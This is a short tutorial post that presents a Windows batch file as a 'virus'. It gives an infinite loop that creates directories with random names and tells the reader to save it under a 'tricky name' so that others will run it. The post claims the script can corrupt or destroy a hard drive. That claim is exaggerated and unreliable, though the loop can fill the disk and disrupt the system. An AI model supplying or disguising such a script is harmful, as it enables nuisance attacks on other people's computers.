When you run this virus on any system it will start creating infinite random directories in the system Hard Drive which may result in HDD corruption on it can even destroy it completely.
So here is what you need to do:
1: Open up notepad or any other text editor.
2: Copy and paste below code into the text editor.
@echo off
:loop
mkdir %random%
goto loop
3: Save the file as "filename.bat" you can pick any tricky name and just add .bat at the end.